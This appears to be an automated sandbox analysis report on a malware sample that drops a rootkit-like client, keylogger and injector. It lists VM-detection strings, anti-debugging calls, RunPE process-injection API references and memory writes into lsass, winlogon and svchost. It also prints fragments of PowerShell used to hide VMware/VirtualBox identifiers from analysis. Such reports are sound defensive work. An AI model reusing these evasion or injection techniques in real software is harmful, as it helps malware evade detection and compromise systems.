                        Source: svchost.exe, 0000001E.00000000.2404308338.0000022E6759C000.00000004.00000001.00020000.00000000.sdmp; Binary or memory string: VMwareVirtual disk2.06000c2942fce4d06663969f532e45d1aPCI Slot 32 : Bus 2 : Device 0 : Function 0 : Adapter 0 : Port 0 : Target 0 : LUN 0PCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218e0f40&0&00
                        Source: svchost.exe, 0000001E.00000000.2404096640.0000022E67512000.00000004.00000001.00020000.00000000.sdmp; Binary or memory string: storahciNECVMWarVMware SATA CD00
                        Source: svchost.exe, 0000001E.00000003.2488059503.0000022E67DB9000.00000004.00000001.00020000.00000000.sdmp; Binary or memory string: VMware Virtual disk 2.0 6000c2942fce4d06663969f532e45d1aPCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218E0F40&0&00NTFS
                        Source: svchost.exe, 0000001E.00000000.2404308338.0000022E67584000.00000004.00000001.00020000.00000000.sdmp; Binary or memory string: VMwareVirtual disk6000c2942fce4d06663969f532e45d1ap
                        Source: svchost.exe, 0000001E.00000000.2403486929.0000022E67080000.00000004.00000001.00020000.00000000.sdmp; Binary or memory string: $value = $pr.Value.replace("VBOX", $value).replace("VBox", $value).replace("VMWARE", $value).replace("VMware Virtual disk", $value).replace("VMware", $value).replace("HARDDISK", "WDC").replace("VIRTUAL_DISK", $value)
                        Source: svchost.exe, 0000001E.00000003.2482259460.0000022E6758D000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: D8VMwareVirtual disk6000c29c2bea38880a8a16ee9f37bec98
                        Source: lsass.exe, 00000014.00000000.2323027145.000002D6F0613000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000002.3470341040.000002D6F0613000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000015.00000002.3465391110.0000014E41C13000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000015.00000000.2339134354.0000014E41C13000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000000.2373968108.0000023C9FE2B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000002.3471607558.0000023C9FE2B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001A.00000002.3466071169.000001A1CA02A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001A.00000000.2376015772.000001A1CA02A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001C.00000000.2380874751.00000200A1241000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001C.00000002.3474707220.00000200A1241000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001E.00000000.2403170166.0000022E66A43000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                        Source: svchost.exe, 0000001E.00000000.2404096640.0000022E67512000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: LSI_SASVMware Virtual disk 6000c29c2bea38880a8a16ee9f37bec9
                        Source: svchost.exe, 00000015.00000000.2339134354.0000014E41C13000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
                        Source: svchost.exe, 0000001E.00000002.3477490370.0000022E66A94000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMCI: Using capabilities (0x1c).
                        Source: lsass.exe, 00000014.00000000.2323428537.000002D6F0688000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: pvmicshutdownNT SERVICE
                        Source: svchost.exe, 0000001E.00000000.2403486929.0000022E67080000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: $value = $pr.Value.replace("VEN_80EE", $value).replace("VEN_15AD", $value).replace("VBOX", $value).replace("VBox", $value).replace("VMWARE", $value).replace("82801FB", $value).replace("82441FX", $value).replace("82371SB", $value).replace("OpenHCD", $value).replace("VMWare", $value).replace("VMware", $value)
                        Source: svchost.exe, 0000001E.00000003.2488059503.0000022E67DB9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware Virtual disk 2.0 6000c29c2bea38880a8a16ee9f37bec9PCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218E0F40&0&00NTFS
                        Source: DeadROOTkit.exe, 00000007.00000002.2316235027.000000000303C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
                        Source: svchost.exe, 0000001E.00000000.2404096640.0000022E67512000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: nonicNECVMWarVMware SATA CD00
                        Source: aoKTzGQSRP.exe, 00000000.00000002.2154040312.0000000000FEE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _VMware_
                        Source: svchost.exe, 0000001E.00000000.2404308338.0000022E67584000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMwareVirtual disk6000c2942fce4d06663969f532e45d1a@
                        Source: svchost.exe, 0000001E.00000000.2403486929.0000022E67080000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: $value = $pr.Value.replace("VBOX", $value).replace("VBox", $value).replace("VMWARE", $value).replace("VMware", $value).replace("VirtualBox", $value).replace("Oracle Corporation", $value).replace("Microsoft Basic Display Adapter", $value)
                        Source: svchost.exe, 0000001E.00000000.2404096640.0000022E67512000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: nonicVMware Virtual disk 6000c2942fce4d06663969f532e45d1a
                        Source: lsass.exe, 00000014.00000000.2325649964.000002D6F0CEB000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMWare
                        Source: svchost.exe, 0000001A.00000002.3464540581.000001A1CA000000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcUmRdpServiceDsSvcfhsvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionsvsvcStorSvcWwanSvcvmicvssDevQueryBrokerNgcSvcsysmainNetmanTabletInputServicePcaSvcDisplayEnhancementServiceIPxlatCfgSvcDeviceAssociationServiceNcbServiceEmbeddedModeSensorServicewlansvcCscServiceWPDBusEnumMixedRealityOpenXRSvc
                        Source: DeadXClient.exe, 00000006.00000002.3500000088.000000001BE30000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW =
                        Source: lsass.exe, 00000014.00000000.2323428537.000002D6F0688000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: pvmicheartbeatNT SERVICE
                        Source: svchost.exe, 0000001E.00000000.2404016134.0000022E6747B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: vmciAP<
                        Source: svchost.exe, 0000001E.00000003.2488059503.0000022E67DB9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware
                        Source: svchost.exe, 0000001E.00000002.3512000158.0000022E67B8C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                        Source: svchost.exe, 0000001E.00000000.2403486929.0000022E67080000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: if(($pr.Name -eq "Caption" -or $pr.Name -eq "Name" -or $pr.Name -eq "PNPDeviceID" -or $pr.Name -eq "AdapterCompatibility" -or $pr.Name -eq "Description" -or $pr.Name -eq "InfSection" -or $pr.Name -eq "VideoProcessor") -and ($pr.Value -match 'VBOX' -or $pr.Value -match 'VBox' -or $pr.Value -match 'VMWARE' -or $pr.Value -match 'VirtualBox' -or $pr.Value -match 'VMware' -or $pr.Value -match 'Oracle Corporation' -or $pr.Value -match 'Microsoft Basic Display Adapter'))
                        Source: svchost.exe, 0000001E.00000000.2404096640.0000022E67512000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: nonicVMware Virtual disk 6000c29c2bea38880a8a16ee9f37bec9
                        Source: svchost.exe, 0000001E.00000000.2403486929.0000022E67080000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: if(($pr.Name -eq "DeviceId" -or $pr.Name -eq "Caption" -or $pr.Name -eq "Model" -or $pr.Name -eq "PNPDeviceID") -and ($pr.Value -match 'VBOX' -or $pr.Value -match 'VBox' -or $pr.Value -match 'VMWARE' -or $pr.Value -match 'VMware'))
                        Source: dwm.exe, 00000017.00000002.3518000549.000001D156B0A000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
                        Source: svchost.exe, 0000001E.00000000.2404308338.0000022E6759C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMwareVirtual disk2.06000c29c2bea38880a8a16ee9f37bec9PCI Slot 32 : Bus 2 : Device 0 : Function 0 : Adapter 0 : Port 0 : Target 0 : LUN 0PCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218e0f40&0&00
                        Source: DeadROOTkit.exe, 00000007.00000002.2317533025.000000001BE00000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllHH
                        Source: svchost.exe, 0000001E.00000000.2403486929.0000022E67080000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: if(($pr.Name -eq "DeviceId" -or $pr.Name -eq "Caption" -or $pr.Name -eq "Name" -or $pr.Name -eq "PNPDeviceID" -or $pr.Name -eq "Service" -or $pr.Name -eq "Description") -and ($pr.Value -match 'VEN_80EE' -or $pr.Value -match 'VEN_15AD' -or $pr.Value -match 'VBOX' -or $pr.Value -match 'VBox' -or $pr.Value -match 'VMWARE' -or $pr.Value -match 'VMWare' -or $pr.Value -match 'VMware' -or $pr.Value -match '82801FB' -or $pr.Value -match '82441FX' -or $pr.Value -match '82371SB' -or $pr.Value -match 'OpenHCD'))
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation

                        Anti Debugging

                        Source: C:\Users\Public\DeadROOTkit.exe -- Code function: 7_2_00007FFD344F78C1 CheckRemoteDebuggerPresent,7_2_00007FFD344F78C1
                        Source: C:\Users\Public\DeadROOTkit.exe -- Process queried: DebugPort
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe -- Code function: 2_2_00007FF6FABFA1D8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00007FF6FABFA1D8
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe -- Code function: 5_2_00007FFD8F787B30 EntryPoint,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,VirtualProtect,5_2_00007FFD8F787B30
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe -- Code function: 2_2_00007FF6FAC03280 GetProcessHeap,2_2_00007FF6FAC03280
                        Source: C:\Users\Public\DeadXClient.exe -- Process token adjusted: Debug
                        Source: C:\Users\Public\DeadROOTkit.exe -- Process token adjusted: Debug
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -- Process token adjusted: Debug
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -- Process token adjusted: Debug
                        Source: C:\Users\Public\Deadsvchost.exe -- Process token adjusted: Debug
                        Source: C:\Windows\System32\dllhost.exe -- Process token adjusted: Debug
                        Source: C:\Users\user\Desktop\aoKTzGQSRP.exe -- Code function: 0_2_00401481 EntryPoint,memset,SetUnhandledExceptionFilter,__set_app_type,_controlfp,__argc,__argv,_environ,_environ,__argv,__getmainargs,__argc,__argv,_environ,__argc,__argc,exit,0_2_00401481
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe -- Code function: 2_2_00007FF6FABEAD00 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00007FF6FABEAD00
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe -- Code function: 2_2_00007FF6FABFA1D8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00007FF6FABFA1D8
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe -- Code function: 2_2_00007FF6FABEB740 SetUnhandledExceptionFilter,2_2_00007FF6FABEB740
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe -- Code function: 2_2_00007FF6FABEB59C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00007FF6FABEB59C
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe -- Code function: 5_2_00007FF6FABEAD00 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_00007FF6FABEAD00
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe -- Code function: 5_2_00007FF6FABFA1D8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_00007FF6FABFA1D8
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe -- Code function: 5_2_00007FF6FABEB740 SetUnhandledExceptionFilter,5_2_00007FF6FABEB740
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe -- Code function: 5_2_00007FF6FABEB59C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_00007FF6FABEB59C
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe -- Code function: 5_2_00007FFD93483058 IsProcessorFeaturePresent,00007FFDA43319C0,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,00007FFDA43319C0,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_00007FFD93483058
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe -- Code function: 5_2_00007FFD9361DA5C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_00007FFD9361DA5C
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe -- Code function: 5_2_00007FFD935A1CBC SetUnhandledExceptionFilter,5_2_00007FFD935A1CBC
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe -- Code function: 5_2_00007FFD935A2135 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_00007FFD935A2135
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe -- Code function: 5_2_00007FFD9DFA3C00 IsProcessorFeaturePresent,00007FFDA43319C0,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,00007FFDA43319C0,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_00007FFD9DFA3C00
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe -- Code function: 5_2_00007FFD9DFD3438 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_00007FFD9DFD3438
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe -- Code function: 5_2_00007FFD9F3B2FF8 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_00007FFD9F3B2FF8
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe -- Code function: 5_2_00007FFD9F3BD070 SetUnhandledExceptionFilter,5_2_00007FFD9F3BD070
                        Source: C:\Users\Public\DeadXClient.exe -- Code function: 6_2_1C598518 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_1C598518
                        Source: C:\Users\Public\DeadXClient.exe -- Code function: 6_2_1C5981B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_1C5981B0
                        Source: C:\Users\Public\DeadXClient.exe -- Code function: 6_2_1C59B62C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_1C59B62C
                        Source: C:\Users\user\AppData\Local\Temp\1.exe -- Memory allocated: page read and write | page guard

                        HIPS / PFW / Operating System Protection Evasion

                        Source: Yara match -- File source: Process Memory Space: CMaker 2.0.exe PID: 1136, type: MEMORYSTR
                        Source: 4.2.1.exe.13091a30.4.raw.unpack, RunPE.cs -- .Net Code: Run contains injection code
                        Source: 8.2.DeadCodeRootKit.exe.1540b0.1.raw.unpack, RunPE.cs -- .Net Code: Run contains injection code
                        Source: 8.0.DeadCodeRootKit.exe.1540b0.1.raw.unpack, RunPE.cs -- .Net Code: Run contains injection code
                        Source: 9.2.powershell.exe.1de7ce30000.16.raw.unpack, RunPE.cs -- .Net Code: Run contains injection code
                        Source: DeadXClient.exe.4.dr, Messages.cs -- Reference to suspicious API methods: capGetDriverDescriptionA(wDriver, ref lpszName, 100, ref lpszVer, 100)
                        Source: DeadROOTkit.exe.4.dr, XLogger.cs -- Reference to suspicious API methods: MapVirtualKey(vkCode, 0u)
                        Source: 4.2.1.exe.13091a30.4.raw.unpack, Unhook.cs -- Reference to suspicious API methods: VirtualProtect((IntPtr)((long)moduleHandle + num5), (IntPtr)num6, 64u, out var oldProtect)
                        Source: 4.2.1.exe.13091a30.4.raw.unpack, RunPE.cs -- Reference to suspicious API methods: OpenProcess(128, inheritHandle: false, parentProcessId)
                        Source: 4.2.1.exe.13091a30.4.raw.unpack, RunPE.cs -- Reference to suspicious API methods: NtAllocateVirtualMemory(process, ref address, IntPtr.Zero, ref size2, 12288u, 64u)
                        Source: 4.2.1.exe.13091a30.4.raw.unpack, RunPE.cs -- Reference to suspicious API methods: NtWriteVirtualMemory(process, address, payload, num3, IntPtr.Zero)
                        Source: 4.2.1.exe.13091a30.4.raw.unpack, RunPE.cs -- Reference to suspicious API methods: NtSetContextThread(thread, intPtr5)
                        Source: C:\Windows\System32\dllhost.exe -- Thread created: C:\Windows\System32\winlogon.exe EIP: 16582AB8
                        Source: C:\Windows\System32\dllhost.exe -- Thread created: C:\Windows\System32\lsass.exe EIP: F14E2AB8
                        Source: C:\Windows\System32\dllhost.exe -- Thread created: C:\Windows\System32\svchost.exe EIP: 41FA2AB8
                        Source: C:\Windows\System32\dllhost.exe -- Thread created: C:\Windows\System32\dwm.exe EIP: 5B082AB8
                        Source: C:\Windows\System32\dllhost.exe -- Thread created: C:\Windows\System32\svchost.exe EIP: F32B2AB8
                        Source: C:\Windows\System32\dllhost.exe -- Thread created: C:\Windows\System32\svchost.exe EIP: 9FD62AB8
                        Source: C:\Windows\System32\dllhost.exe -- Thread created: C:\Windows\System32\svchost.exe EIP: CA6E2AB8
                        Source: C:\Windows\System32\dllhost.exe -- Thread created: C:\Windows\System32\svchost.exe EIP: ED7B2AB8
                        Source: C:\Windows\System32\dllhost.exe -- Thread created: C:\Windows\System32\svchost.exe EIP: A1982AB8
                        Source: C:\Windows\System32\dllhost.exe -- Thread created: C:\Windows\System32\svchost.exe EIP: 95FB2AB8
                        Source: C:\Windows\System32\dllhost.exe -- Thread created: C:\Windows\System32\svchost.exe EIP: 670C2AB8
                        Source: C:\Windows\System32\dllhost.exe -- Thread created: C:\Windows\System32\svchost.exe EIP: 4A4B2AB8
                        Source: C:\Windows\System32\dllhost.exe -- Thread created: C:\Windows\System32\svchost.exe EIP: 19A42AB8
                        Source: C:\Windows\System32\dllhost.exe -- Thread created: C:\Windows\System32\svchost.exe EIP: D1FC2AB8
                        Source: C:\Windows\System32\dllhost.exe -- Thread created: C:\Windows\System32\svchost.exe EIP: BDC92AB8
                        Source: C:\Windows\System32\dllhost.exe -- Thread created: C:\Windows\System32\svchost.exe EIP: D8FC2AB8
                        Source: C:\Windows\System32\dllhost.exe -- Thread created: C:\Windows\System32\svchost.exe EIP: D2C72AB8
                        Source: C:\Windows\System32\dllhost.exe -- Thread created: C:\Windows\System32\svchost.exe EIP: CE6B2AB8
                        Source: C:\Windows\System32\dllhost.exe -- Thread created: C:\Windows\System32\svchost.exe EIP: AEFD2AB8
                        Source: C:\Windows\System32\dllhost.exe -- Thread created: C:\Windows\System32\svchost.exe EIP: B6942AB8
                        Source: C:\Windows\System32\dllhost.exe -- Thread created: C:\Windows\System32\svchost.exe EIP: A22A2AB8
                        Source: C:\Windows\System32\dllhost.exe -- Thread created: C:\Windows\System32\svchost.exe EIP: 25AA2AB8
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 6721CF
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 12A21CF
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 13E21CF
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 13D21CF
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: DA21CF
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 3921CF
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 4321CF
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 22421CF
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 31221CF
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F021CF
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: FA21CF
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2A621CF
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 14721CF
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D021CF
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D721CF
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8121CF
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F021CF
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 1C562AB8
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: CDA02AB8
                        Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\wbem\WMIADAP.exe EIP: 9A4B2AB8
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 56262AB8
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 87A32AB8
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 1122AB8
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 11C2AB8
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140000000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\winlogon.exe base: 2D016580000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\lsass.exe base: 2D6F14E0000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 14E41FA0000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dwm.exe base: 1D15B080000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 23AF32B0000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 23C9FD60000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1A1CA6E0000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 246ED7B0000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 200A1980000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 22595FB0000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 22E670C0000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1FE4A4B0000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 24C19A40000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 275D1FC0000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 23BBDC90000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 227D8FC0000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2DED2C70000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 14ACE6B0000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 220AEFD0000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 241B6940000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 202A22A0000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 14D25AA0000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1BD1A2F0000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 21A63950000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1834ABA0000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2D8F03D0000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 18BAF3C0000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 256EBEB0000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2568E1B0000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 226A7DC0000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\spoolsv.exe base: 12A0000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1E2C0F50000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2EE0D7C0000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 22B68FC0000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 207EA5D0000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 1EBCE9B0000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 11CD5BB0000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1AFDEB70000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 207C0460000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 245A2150000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 24708EB0000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 22F60740000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 26E569B0000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2CA8FE60000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\sihost.exe base: 1D63DC20000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1A799B20000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1F6984F0000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 26481BB0000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 166D2D90000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\ctfmon.exe base: 128DE440000 value starts with: 4D5A
